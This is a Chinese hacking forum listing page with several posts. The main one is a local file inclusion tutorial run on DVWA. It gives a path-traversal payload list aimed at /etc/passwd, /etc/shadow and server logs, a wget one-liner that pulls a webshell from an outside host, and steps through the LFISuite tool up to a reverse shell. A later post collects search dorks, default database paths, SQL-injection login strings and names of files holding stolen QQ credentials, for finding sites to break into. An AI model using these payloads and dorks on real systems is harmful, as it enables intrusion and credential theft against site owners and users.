一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
今日:0
文章:78
今日:0
文章:13
今日:0
文章:9
今日:0
文章:139
今日:0
文章:30
今日:0
文章:63
今日:0
文章:19
今日:0
文章:0
今日:0    总帖:879
feng
3119
今天在公众号看到了一个本地文件包含的利用工具,看了下国外大牛对该工具的使用的一个视频,感觉很厉害,通过该工具可对存在本地文件包含漏洞的站点进行利用并返回一个LFI shell,通过返回的LFI shell再次获取一个反向连接,从而可执行相关命令,以前对本地文件包含的利用大多都停留在读取文件,如果有远程文件包含的话就可以getshell。这篇文章主要是对本地文件包含的一个简单介绍及利用,主要是对工具的使用,也主要是记录下该过程,方便以后查看,然后再抽时间研究下大神源代码!大神请绕道而行!: )0x01 文件包含漏洞原理文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件使用硬编码,一般是不会出现安全问题,但是有时可能不确定需要包含哪些具体文件,所以就会采用变量的形式来传递需要包含的文件,但是在使用包含文件的过程中,未对包含的变量进行检查及过滤,导致外部提交的恶意数据作为变量进入到了文件包含的过程中,从而导致提交的恶意数据被执行。文件包含通常分为本地文件包含(Local File Inclusion)和远程文件包含(Remote File Inclusion)。allow_url_fopen和 allow_url_include为0n的情况认为是远程文件包含漏洞,allow_url_fopen为off和 allow_url_include为0n为本地文件包含漏洞,如图1 配置文件所示。本次主要是利用本地文件包含,所以将allow_url_fopen设置为了off。图1 php.ini配置另外,文件包含漏洞主要涉及到的危险函数有四个:include(),require()和include_once(),require_once()。include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行。require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本。include_once()和require_once():若文件中代码已被包含则不会再次包含。(来自简书)0x02 文件包含漏洞危害通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解,若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制;另外文件包含漏洞还可能导致执行任意代码,不管本地文件包含还是远程文件包含!常见的利用方法有以下三点:一、读取目标主机上的其他文件,主要是本地文件包含。二、包含可运行的网页木马,主要是远程文件包含,前提是"allow_url_fopen"是激活的(默认是激活的,没几个人会修改)。三、包含一个创建文件的相应代码文件,因为通过文件包含漏洞获取的shell不是长久的,如果这个漏洞修补了,那么shell也就不存在了,因此需要创建一个真实的shell。我们可以先包含一个可以执行cmd的伪shell,然后使用wget加-O参数(类似:http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wget http://x.x.x.x/muma.txt -O muma.php)获取一个真正的webshell。如果系统中没有wget命令,获取目录不可写,那么我们可以包含一个创建文件的脚本,然后通过脚本上传木马文件。除了以上三点外,应该还有一点就是执行任意命令!0x03 实验环境本次实验环境主要是利用dvwa平台进行演示,如图2所示。DVWA(Damn Vulnerable Web Application)是用PHP+MySQL编写的一套Web漏洞平台,说简单点就是所谓的网站漏洞靶机,该平台包含了SQL注入、XSS、本地文件包含、命令执行等一些常见的Web安全漏洞,并且该平台是开源的,可以从官网直接下载。图2 dvwa平台0x04 本地文件包含利用工具本次主要使用的是LFI SUIT本地文件包含利用工具,是一款用Python2.7编写的神器,适用于Windows,Linux和OS X,并且首次使用会自动配置,自动安装需要的模块,该工具提供了九种不同的文件包含攻击模块,如图3所示。另外当你通过一个可利用的攻击获取到一个LFI shell后,你可以通过输入“reverseshell”命令轻易地获得一个反向shell。但是前提是你必须让你的系统监听反向连接,比如使用“nc –lvp port”。图3 九种不同的文件包含攻击模块0x05 本地文件包含读取文件在之前的本地文件包含漏洞中,大多数都是进行读取文件,如Linux下的密码文件(../../../../etc/shadow以及../../../../etc/passwd),获取并读取一些你知道物理路径的一些文件,如图4所示。图4 读取已知路径下的文件以下是一些简单的测试用例,根据实际情况进行适当的修改。../../tomcat/conf/tomcat-users.xml../%2e%2e%2f which translates to ../%2e%2e/ which translates to ../..%2f which translates to ../%2e%2e%5c which translates to ..\%c1%1c%c0%9v%c0%af..%5c../../../../../../../../../../../../../etc/hosts%00../../../../../../../../../../../../etc/hosts../../boot.ini/../../../../../../../../%2A../../../../../../../../../../../../etc/passwd%00../../../../../../../../../../../../etc/passwd../../../../../../../../../../../../etc/shadow%00../../../../../../../../../../../../etc/shadow/../../../../../../../../../../etc/passwd^^/../../../../../../../../../../etc/shadow^^/../../../../../../../../../../etc/passwd/../../../../../../../../../../etc/shadow/./././././././././././etc/passwd/./././././././././././etc/shadow\..\..\..\..\..\..\..\..\..\..\etc\passwd\..\..\..\..\..\..\..\..\..\..\etc\shadow..\..\..\..\..\..\..\..\..\..\etc\passwd..\..\..\..\..\..\..\..\..\..\etc\shadow/..\../..\../..\../..\../..\../..\../etc/passwd/..\../..\../..\../..\../..\../..\../etc/shadow.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow\..\..\..\..\..\..\..\..\..\..\etc\passwd%00\..\..\..\..\..\..\..\..\..\..\etc\shadow%00..\..\..\..\..\..\..\..\..\..\etc\passwd%00..\..\..\..\..\..\..\..\..\..\etc\shadow%00%0a/bin/cat%20/etc/passwd%0a/bin/cat%20/etc/shadow%00/etc/passwd%00%00/etc/shadow%00%00../../../../../../etc/passwd%00../../../../../../etc/shadow/../../../../../../../../../../../etc/passwd%00.jpg/../../../../../../../../../../../etc/passwd%00.html/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini\\'/bin/cat%20/etc/passwd\\'\\'/bin/cat%20/etc/shadow\\'../../../../../../../../conf/server.xml/../../../../../../../../bin/id|C:/inetpub/wwwroot/global.asaC:\inetpub\wwwroot\global.asaC:/boot.iniC:\boot.ini../../../../../../../../../../../../localstart.asp%00../../../../../../../../../../../../localstart.asp../../../../../../../../../../../../boot.ini%00../../../../../../../../../../../../boot.ini/./././././././././././boot.ini/../../../../../../../../../../../boot.ini%00/../../../../../../../../../../../boot.ini/..\../..\../..\../..\../..\../..\../boot.ini/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini\..\..\..\..\..\..\..\..\..\..\boot.ini..\..\..\..\..\..\..\..\..\..\boot.ini%00..\..\..\..\..\..\..\..\..\..\boot.ini/../../../../../../../../../../../boot.ini%00.html/../../../../../../../../../../../boot.ini%00.jpg/.../.../.../.../.../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo../../../../../../../../../../var/log/httpd/access_log../../../../../../../../../../var/log/httpd/error_log../apache/logs/error.log../apache/logs/access.log../../apache/logs/error.log../../apache/logs/access.log../../../apache/logs/error.log../../../apache/logs/access.log../../../../../../../../../../etc/httpd/logs/acces_log../../../../../../../../../../etc/httpd/logs/acces.log../../../../../../../../../../etc/httpd/logs/error_log../../../../../../../../../../etc/httpd/logs/error.log../../../../../../../../../../var/www/logs/access_log../../../../../../../../../../var/www/logs/access.log../../../../../../../../../../usr/local/apache/logs/access_log../../../../../../../../../../usr/local/apache/logs/access.log../../../../../../../../../../var/log/apache/access_log../../../../../../../../../../var/log/apache/access.log../../../../../../../../../../var/log/access_log../../../../../../../../../../var/www/logs/error_log../../../../../../../../../../var/www/logs/error.log../../../../../../../../../../usr/local/apache/logs/error_log../../../../../../../../../../usr/local/apache/logs/error.log../../../../../../../../../../var/log/apache/error_log../../../../../../../../../../var/log/apache/error.log../../../../../../../../../../var/log/access_log../../../../../../../../../../var/log/error_log/var/log/httpd/access_log/var/log/httpd/error_log../apache/logs/error.log../apache/logs/access.log../../apache/logs/error.log../../apache/logs/access.log../../../apache/logs/error.log../../../apache/logs/access.log/etc/httpd/logs/acces_log/etc/httpd/logs/acces.log/etc/httpd/logs/error_log/etc/httpd/logs/error.log/var/www/logs/access_log/var/www/logs/access.log/usr/local/apache/logs/access_log/usr/local/apache/logs/access.log/var/log/apache/access_log/var/log/apache/access.log/var/log/access_log/var/www/logs/error_log/var/www/logs/error.log/usr/local/apache/logs/error_log/usr/local/apache/logs/error.log/var/log/apache/error_log/var/log/apache/error.log/var/log/access_log/var/log/error_log../../../WEB-INF/web.xml0x06 神器简单获取LFI shell运行LFI SUIT工具及选择攻击模块直接使用python lfisuite.py,如图5所示。此时我们选择利用功能模块1。图5 运行本地文件包含利用工具设置cookie在我们选择利用功能模块1后,会提示让我们输入cookie,如图6所示:图6 设置cookie获取cookie浏览器F12console输入document.cookie即可获取到当前cookie,如图7所示。图7 获取cookie成功获取LFI shell输入cookie后,我们随便选择一个攻击模块试试,在此我们选择3,选取攻击模块后,我们输入漏洞地址即可成功获取到一个shell,如图8所示。图8 成功获取LFI shell0x07 自动模块获取lfi shell如果我们不知道那个攻击模块可以返回shell,我们可以选择自动攻击模块。图9 自动攻击模块选择之后,我们需要选择一个包含路径的文件,我们选择当前目录下的一个文件即可。图10 选择文件选择文件后,该工具会尝试可能性的路径,并且加以利用。图11 选择文件如图12所示,我们成功获取了一个shell。图12 成功获取shell0x08 获取一个反向连接在我们已经获取到lfi shell后,我们可以使用reverseshell来获取一个反向连接,我们先进行监听反向连接,如图13所示。图13 设置监听反向连接我们输入reverseshell后,设置IP即可图14 设置ip及端口此时,我们也成功获取到了一个反向连接,如图15所示。图15 获取到反向连接0x09 扫描模块另外,我们也可以先使用扫描模块,然后在选择对应的攻击模块也能成功获取到LFI shell。使用方法与上面都是一样的,再次就不再进行描述了。0x10 总结与修复本文主要是对文件包含做了一个简单的介绍,如文件包含漏洞的简单原理及危害,最重要的是对本地文件包含漏洞的进一步利用,通过本地文件包含漏洞,从而获取到一个反向连接或者是LFI shell。通过本文也让自己对本地文件包含的危害和利用都有了一定的提高,不在是只停留在读取文件上!通过对该漏洞的利用,最安全的是设置allow_url_fopen和 allow_url_include为0ff,这样就不能利用该漏洞了,另一方面可以做白名单限制,相当于是硬编码,直接把需要包含的文件固定死,这样既不会影响业务,也不会很轻松被利用,其次还是要对用户的输入保持怀疑态度,对用户的输入变量进行严格的检查及过滤! 
经验教程 4 0 2699天前
wolfman
3462
腾讯旗下手游《 王者荣耀 》近日推出防沉迷系统,包括限制未成年人每天登陆的时长、升级成长守护平台、强化实名认证体系等。但有“小学生”表示可以通过使用成人身份证、或购买成人账号等方法破解。腾讯对此回应称,将严厉打击网络黑产,并对系统持续完善。据介绍,由于防沉迷系统是通过用户注册时提交的身份信息来判断用户年龄的,所以一些未成年人开始通过买卖账号或者借用他人身份信息的方式绕过系统限制。解除方法就是将未成年人的身份证信息替换为姓名相同、身份证号不同的成年人的身份证信息。另外有部分低年龄段玩家表示,网上也能搜到成年人身份证号,用以注册账号,便能够绕过监管。有的甚至干脆用父母的身份证号注册,“躲着父母”玩。据悉,目前还有很多网络平台在公开售卖《王者荣耀》账号,未成年人可以直接购买,一个账号最多可卖到数千元,据商家反映这门生意“供销两旺”。针对用户需求,部分商家也表示,可以提供技术手段破解防沉迷系统,将账号中未成年人的身份信息,直接改为成年人身份信息。腾讯对此回应称,当前网络黑产目前已经成为不可忽视的问题,腾讯一直以来积极配合相关部门,从技术到司法层面,对于网络黑产进行长期的打击与对抗。目前《王者荣耀》健康系统刚刚上线,我们正在进行持续完善,包括将买卖账号等黑产信息纳入屏蔽词库,加大游戏内巡查与处理,同时也在驱动网上的交易平台,对涉相关黑产的交易账号进行惩处,并加强实名验证,避免黑产链条从中非法牟利。《王者荣耀》开发团队此前也表示,将要求少部分信息不全的玩家尽快补全个人信息,后续也将配合相关部门进行身份真实性校验,若存在信息错误的问题也可能会邀请部分玩家重新填写,未来实名认证系统将实行进一步强化措施。
文章资讯 10 0 2702天前
wolfman
2908
本文给大家分享了html提高页面加载速度的方法,非常不错具有参考借鉴加载,需要的朋友参考下(1)减少 HTTP 的请求。(合并资源文件 和 使用图片精灵 ;(2)把CSS  放头部,把 JavaScript 放到 body 标签尾部;(3)定义图片的宽和高;(4)定义字符集;(5)避免空的 src 和 href 属性,    html里这样写:<a href="javascript:;" class="triggerName">Trigger</a>     js 里这样定义:       $("#triggerName").click(function(e){            e.preventDefault(); // 取消单击事件的默认动作以阻止链接的跳转//        }) (6)启用 GZIP 压缩;(7)摈弃 CSS 表达式,用更高效的 CSS 选择器;(8)使用外链的 CSS 和 JavaScript;(9) 对 CSS 和 JavaScript 进行代码压缩;(10)减少重绘;以上所述是小编给大家介绍的HTML 提高页面加载速度的方法,希望对大家有所帮助!
经验教程 6 0 2702天前
wolfman
2989
    由于在页面中总是难免javascript脚本语言,在代码中看到body里可以放<script type=”text/javascript”>脚本,而head里也可用<scripttype=”text/javascript”>脚本,想要用好他们,就得了解他们的区别,经过自己的总结发现他们的区别如下: 一、在head主体里写,如果有方法体,那么就是在客户点击的时候触发,如果没写方法体,比如引入的js文件,那么在加载页面前就预加载了。 二、写在body主体里,是为了实现某些部分动态地创建文档。 这里比如制作鼠标跟随事件,肯定只有当页面加载后再进行对鼠标坐标的计算。或者是filter滤镜与javascript的联合使用产生的图片淡入淡出效果等。这个是在页面加载的时候加载。 二、会与body和head标签顺序有关。比如下面代码: <html> <body> <script type="text/javascript"> alert("in body"); </script> </body> <head> <script type="text/javascript"> alert("in head"); </script> </head> </html> 结果是先弹出body,再弹出head. 如果改下代码结果就截然相反了,例 <html> <head> <script type="text/javascript"> alert("in head"); </script> </head> <body> <script type="text/javascript"> alert("in body"); </script> </body> </html> 执行时得考虑javascript执行顺序
经验教程 6 0 2702天前
wolfman
3201
先给大家分享下三种查看路径的方法:1、直接按F122、Ctrl+Shift+I查看3、鼠标点击右键查看把以上三种状态都屏蔽掉就可以了。document有onkeydown(键盘按键事件),该事件里面找到对应的keycode并处理就可以,document也有oncontextmenu鼠标右键事件,屏蔽即可却不影响ctrl+c的功能。EMLOG的话在底部添加以下代码,其他程序看着情况添加即可<script language="javascript" type="text/javascript"> window.onload=function(){ document.onkeydown=function(){ var e=window.event||arguments[0]; if(e.keyCode==123){ alert(" 如果刷新请按F5 "); return false; }else if((e.ctrlKey)&&(e.shiftKey)&&(e.keyCode==73)){ alert("键位屏蔽 http://www.xu311.com"); return false; } }; document.oncontextmenu=function(){ alert(" 如果刷新请按F5 "); return false; } } </script>
经验教程 4 0 2702天前
wolfman
11017
在线子域名爆破php网页源码分享二级域名快速爆破,一键爆破子域名加ip地址!字典自行修改添加源码百度网盘链接:http://pan.baidu.com/s/1c6a4fc 密码:i164
经验教程 7 0 2702天前
wolfman
2907
杨小杰以前发布过《杨小杰工具箱网页源码》的文章,但是我始终觉得老是去修改源码会很费劲,要是加上一个后台那就会很方便了,所以在这个想法的驱使下,找到了技术支持(涛先森)完完整整的做了一个后台对接!后台可一键修改内容!链接:http://pan.baidu.com/s/1jHXoFqu 密码:bu78
经验教程 6 0 2702天前
wolfman
2755
<script type="text/javascript"> //屏蔽右键菜单 document.oncontextmenu = function (event){ if(window.event){ event = window.event; }try{ var the = event.srcElement; if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){ return false; } return true; }catch (e){ return false; } } //屏蔽粘贴 document.onpaste = function (event){ if(window.event){ event = window.event; }try{ var the = event.srcElement; if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){ return false; } return true; }catch (e){ return false; } } //屏蔽复制 document.oncopy = function (event){ if(window.event){ event = window.event; }try{ var the = event.srcElement; if(!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){ return false; } return true; }catch (e){ return false; } } //屏蔽剪切 document.oncut = function (event){ if(window.event){ event = window.event; }try{ var the = event.srcElement; if(!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){ return false; } return true; }catch (e){ return false; } } //屏蔽选中 document.onselectstart = function (event){ if(window.event){ event = window.event; }try{ var the = event.srcElement; if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){ return false; } return true; } catch (e) { return false; } } </script>
经验教程 5 0 2702天前
anquan18
280
您的阅读权限太低或您的用户组不被允许
经验教程 7 3 2704天前
wolfman
4212
网站漏洞关键词总结   资源分享
挖掘鸡关键字 关键字:powerwendayver1.0添加:/db/pw_sys_data.mdb关键字:poweredbywebboy添加:/upfile.asp关键字:poweredby:smtversion5.0添加:/bbs/upfile.asp/upfile_flash.asp关键字:team5studioallrightsreserved添加:/data/team.mdb关键字:传奇私服添加:/msmirdata/msmirarticle.mdb(默认数据库)后台管理地址:http;//您的域名/msmiradmin/关键字:同城约会贺卡传情情感随笔热门投票添加:/admin/upload_file.asp(明小子上传)关键字:公司后台添加:/manage/login.asp(用"or"="or")关键字:企业邮局企业荣誉营销网络产品分类信息反馈联系我们收藏本站网站管理添加:/admin/login.asp(后台管理地址,管理员帐号密码=admin)关键字:bywygk添加:/data/scadata.mdzhaozhon关键字:powersystemofarticlemanagementver3.0build20030628添加:/databaseyiuwekdsodksldfslwifds.mdb(后台的后缀全是/admin_index.asp)  关键字:foosun添加:/foosun_data/fs400.mdbadmin/login.asp(后台的后缀全是admin/login.asp)关键字:poweredbykesioninc默认数据库ks_data/ks_database.mdb关键字:inurl:qq.txt(啊拉)inurl:mz.txt(极限居)inurlqcjb.txt(qq冲击波)inurl:qqnum.txt(完美)1、如在网站中找到诸如:“请登录后再使用本功能!”这样的就可以用明小子上传试试2、使用明小子上传时选择“动力上传漏洞—/upfile_softpic.asp页面”  明小子关键词:1.productshow.asp?articleid=2.inurl:show_news.asp?id=3.siteinurl:article_print.asp9.4.edit.asp?5.site:cq.cninurl:asp6.intitle:网站小助手7.poweredbycomersusaspshoppingcartopensource8http://clown-cbc.lofter.com/post/skins/default/9.动力上传系统10.oioj"sblog11.动网:reloadforumcache.asp12."intextiscuz!4.1.0"13.尚奈克斯14.team5studioallrightsreserved15.xxxinurl:nclass.asp16.poweredbycdn_news17.发布系统18.asp?id=119.poweredby:94kkbbs200520.inurl:readnews.asp21.程序核心经典的用户名密码"or"="or""or"1"="1这2个密码在很多网站后台,qq空间相册都可以登陆,不过不是100%而已....inurl:用于搜索网页上包含的url.这个语法对寻找网页上的搜索,帮助之类的很有用.intext:只搜索网页<body>部分中包含的文字(也就是忽略了标题,url等的文字).site:可以限制你搜索范围的域名.filetype:搜索文件的后缀或者扩展名intitle:限制你搜索的网页标题.allintitle:搜索所有关键字构成标题的网页.但是推荐不要使用link:可以得到一个所有包含了某个指定url的页面列表.例如link:www.google.com就可以得到所有连接到google的页面===================================================================================intext:管理filetype:mdbinurl:filesite:xx.comfiletype:txt查找txt文件其他的依次内推site:xx.comintext:管理site:xx.cominurl:loginsite:xx.comintitle:后台查看服务器使用的程序site:xx.comfiletype:aspsite:xx.comfiletype:phpsite:xx.comfiletype:jsp查看上传漏洞:site:xx.cominurl:filesite:xx.cominurl:load查找注射点:site:xx.comfiletype:aspsite:twinurl:asp?id=这个是找台湾的或site:jpinurl:asp?id=这个是找日本的或site:koinurl:asp?id=这个是找韩国的依次类推  1、如在网站中找到诸如:“请登录后再使用本功能!”这样的就可以用明小子上传试试2、使用明小子上传时选择“动力上传漏洞—/upfile_softpic.asp页面”pwd.asppwd.txt123.asp123.txtqqhao.txtqqhao.aspqqmima.aspqqmima.txtqq.txtqq.asp关键字就要自己想些独特一点的如果都去扫那些什么免费qb什么的那都是别人扫剩下的你拿来也没用记得一定要独特比如收号信箱等等充分发挥你的想象空间     关键字:powerwendayver1.0添加:/db/pw_sys_data.mdb关键字:poweredbywebboy添加:/upfile.asp关键字:poweredby:smtversion5.0添加:/bbs/upfile.asp/upfile_flash.asp关键字:team5studioallrightsreserved添加:/data/team.mdb关键字:传奇私服添加:/msmirdata/msmirarticle.mdb(默认数据库)后台管理地址:http;//您的域名/msmiradmin/关键字:同城约会贺卡传情情感随笔热门投票添加:/admin/upload_file.asp(明小子上传)关键字:公司后台添加:/manage/login.asp(用"or"="or")关键字:企业邮局企业荣誉营销网络产品分类信息反馈联系我们收藏本站网站管理添加:/admin/login.asp(后台管理地址,管理员帐号密码=admin)关键字:bywygk添加:/data/scadata.mdb关键字:powersystemofarticlemanagementver3.0build20030628添加:/databaseyiuwekdsodksldfslwifds.mdb(后台的后缀全是/admin_index.asp)  关键字:foosun添加:/foosun_data/fs400.mdbadmin/login.asp(后台的后缀全是admin/login.asp)关键字:poweredbykesioninc默认数据库ks_data/ks_database.mdb关键字:inurl:qq.txt(啊拉)inurl:mz.txt(极限居)inurlqcjb.txt(qq冲击波)inurl:qqnum.txt(完美)  传奇服务端:cq.rarcq2.rarmir.rarmir2.rarserver.rarcqserver.rarmir2.bak热血江湖:jhpass.txtrxjh.txtrxjh.asprxjhname.txt网游猎手(26in1)网络游戏木马生成器:wddata.mdbmyasp/lin.asp88088186.aspqq:mypass.txtmyqqpass.txtqqhao.txtganqq.txtdaoqq.txt转载:原创@颓废
文章资讯 11 0 2704天前
加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:18.188.188.152,2025-01-16 14:02:31,Processed in 0.23192 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.1.0